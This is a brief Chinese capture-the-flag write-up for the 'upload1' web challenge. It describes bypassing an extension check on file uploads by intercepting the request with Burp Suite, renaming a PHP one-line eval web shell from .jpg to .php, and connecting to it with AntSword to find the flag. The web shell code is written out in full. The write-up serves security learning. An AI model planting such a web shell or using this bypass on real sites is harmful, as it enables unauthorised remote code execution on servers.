攻防世界 WEB 高手进阶区 upload1 Writeup

攻防世界 WEB 高手进阶区 upload1 Writeup

题目介绍

image-20210114193848922

题目考点

  • 文件上传漏洞
  • 一句话木马
  • 中国菜刀类工具的使用

Writeup

  1. image-20210114194114330

  2. 使用burpsuite抓包

    image-20210114194227292

  3. 可见只是对上传文件的后缀进行可一个简单判断

  4. 准备一句话木马文件, 后缀改为 jpg 格式

    <?php @eval($_POST['pass']);?>

  5. 使用burpsuite抓包,更改文件后缀为php

    image-20210114194619507

    image-20210114194637221

  6. 使用蚁剑连接 http://220.249.52.134:55798/upload/1610623427.a.php 目录遍历一番,找到flag

    image-20210114194756687

    image-20210114194815302

    image-20210114194830150

posted @ 2021-01-14 19:50  FreeK0x00  阅读(174)  评论(0编辑  收藏  举报